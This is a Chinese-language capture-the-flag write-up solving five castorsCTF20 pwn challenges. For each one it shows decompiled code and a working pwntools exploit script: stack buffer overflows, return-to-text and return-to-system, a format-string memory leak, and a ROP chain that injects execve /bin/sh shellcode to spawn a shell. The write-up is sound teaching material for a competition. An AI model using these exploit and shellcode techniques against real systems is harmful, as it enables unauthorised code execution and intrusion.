【WriteUp】castorsCTF20 -- Pwn 题解

abcbof

Description:

nc chals20.cybercastors.com 14424

Solution:

程序保护如下:

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

main 函数如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-110h]
  char s2; // [rsp+100h] [rbp-10h]

  printf("Hello everyone, say your name: ", argv, envp);
  gets(&v4);
  if ( !strcmp("CyberCastors", &s2) )
    get_flag();
  puts("You lose!");
  return 0;
}

get_flag 函数如下:

void __noreturn get_flag()
{
  char v0; // [rsp+7h] [rbp-9h]
  FILE *stream; // [rsp+8h] [rbp-8h]

  stream = fopen("flag.txt", "r");
  if ( !stream )
    exit(1);
  while ( 1 )
  {
    v0 = fgetc(stream);
    if ( v0 == -1 )
      break;
    putchar(v0);
  }
  fclose(stream);
  exit(0);
}

解题思路:

覆盖变量漏洞

exp 如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 1
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14424)

pd = '\x00' * 0x100
pd += 'CyberCastors'
p.sendlineafter('name: ', pd)
p.interactive()

Flag:

castorsCTF{b0f_4r3_n0t_th4t_h4rd_or_4r3_th3y?}

babybof1

Description:

nc chals20.cybercastors.com 14425

Solution:

程序保护如下:

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x400000)
RWX:      Has RWX segments

main 函数如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-100h]

  puts("Welcome to the cybercastors Babybof");
  printf("Say your name: ", argv);
  return gets(&v4);
}

get_flag 函数如下:

void __noreturn get_flag()
{
  char v0; // [rsp+7h] [rbp-9h]
  FILE *stream; // [rsp+8h] [rbp-8h]

  stream = fopen("flag.txt", "r");
  if ( !stream )
    exit(1);
  while ( 1 )
  {
    v0 = fgetc(stream);
    if ( v0 == -1 )
      break;
    putchar(v0);
  }
  fclose(stream);
  exit(0);
}

解题思路:

ret2text 没啥说的

exp 如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 1
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14425)
elf = ELF('./chall', checksec=False)
addr_get_flag = elf.sym['get_flag']

pd = '\x00' * 0x108
pd += p64(addr_get_flag)
p.sendlineafter('name: ', pd)
p.interactive()

Flag:

castorsCTF{th4t's_c00l_but_c4n_y0u_g3t_4_sh3ll_n0w?}

babybof2

Description:

nc chals20.cybercastors.com 14434

Solution:

程序保护如下:

Arch:     i386-32-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

main 函数如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  puts("Do you really think you can get to the winners table?");
  puts("I'll give you one shot at it, what floor is the table at: ");
  start();
  puts("Yeah that's what I thougt, LOL.\n");
  return 0;
}

start 函数如下:

char *start()
{
  char s; // [esp+0h] [ebp-48h]

  return gets(&s);
}

winnersLevel 函数如下:

signed int __cdecl winnersLevel(int a1)
{
  signed int result; // eax

  if ( a1 != 386 && a1 != 258 )
  {
    puts("You guessed right but it seems your badge number isn't on our list.");
    result = 0;
  }
  else
  {
    puts("Wow! Please excuse me sir I had no idea...here are your chips");
    system("cat ./flag.txt");
    result = 1;
  }
  return result;
}

解题思路:

直接 plt_system 加参数读取 flag 就完事

exp 如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 1
context(arch='i386', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14434)
elf = ELF('./chall', checksec=False)
plt_system = elf.plt['system']
addr_flag = 0x0804A046

# gdb.attach(p, "b *0x08049228\nc")
pd = 'a' * 0x4c
pd += p32(plt_system)
pd += p32(0)
pd += p32(addr_flag)
p.sendline(pd)
p.interactive()

Flag:

castorsCTF{b0F_s_4r3_V3rry_fuN_4m_l_r1ght}

babyfmt

Description:

nc chals20.cybercastors.com 14426

Solution:

程序保护如下:

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

main 函数如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  FILE *stream; // [rsp+8h] [rbp-218h]
  char v5; // [rsp+10h] [rbp-210h]
  char s; // [rsp+110h] [rbp-110h]
  unsigned __int64 v7; // [rsp+218h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  stream = fopen("flag.txt", "r");
  if ( !stream )
    exit(1);
  __isoc99_fscanf(stream, "%s", &v5);
  fclose(stream);
  printf("Hello everyone, this is babyfmt! say something: ");
  fgets(&s, 255, _bss_start);
  printf(&s, 255LL);
  return 0;
}

解题思路:

不知道为啥远程还有 \r,本地和远程脚本反正不是很一样

这题拿 %lx 泄露字符串就行

exp 如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import binascii

debug = 2
context(arch='i386', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14426)

pd = ''
for i in range(8, 0x10):
    pd += '%' + str(i) + '$lx.tmp'
p.sendline(pd)
p.recvuntil('tmp\r\n')
res = []
for i in range(0, 8):
    res.append(binascii.unhexlify(p.recvuntil('.tmp')[:-4].rjust(0x10, '0'))[::-1])
print ''.join(res)
p.interactive()

Flag:

castorsCTF{l34k_l34k_th4t_f0rm4t_str1n6_l34k}

babybof1 pt2

Description:

nc chals20.cybercastors.com 14425

Solution:

程序保护如下:

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x400000)
RWX:      Has RWX segments

main 函数如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-100h]

  puts("Welcome to the cybercastors Babybof");
  printf("Say your name: ", argv);
  return gets(&v4);
}

get_flag 函数如下:

void __noreturn get_flag()
{
  char v0; // [rsp+7h] [rbp-9h]
  FILE *stream; // [rsp+8h] [rbp-8h]

  stream = fopen("flag.txt", "r");
  if ( !stream )
    exit(1);
  while ( 1 )
  {
    v0 = fgetc(stream);
    if ( v0 == -1 )
      break;
    putchar(v0);
  }
  fclose(stream);
  exit(0);
}

解题思路:

前面那个 flag 说你要尝试拿到 shell,那这道题的 get_flag 函数就没啥用了

ret2libc 好像一开始可以,后来主办方貌似禁了,用 ret2shellcode 也可

exp 如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 2
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14425)
elf = ELF('./chall', checksec=False)
plt_gets = elf.plt['gets']
addr_bss = elf.bss()
addr_rop1 = elf.search(asm("pop rdi;ret")).next()


pd = '\x00' * 0x108
pd += p64(addr_rop1)
pd += p64(addr_bss)
pd += p64(plt_gets)
pd += p64(addr_bss)
# gdb.attach(p, "b *0x40078B\nc")
p.sendlineafter('Babybof\r\n', pd)

pd = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
p.sendline(pd)
p.interactive()

Flag:

castorsCTF{w0w_U_jU5t_h4ck3d_th15!!1_c4ll_th3_c0p5!11}
点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注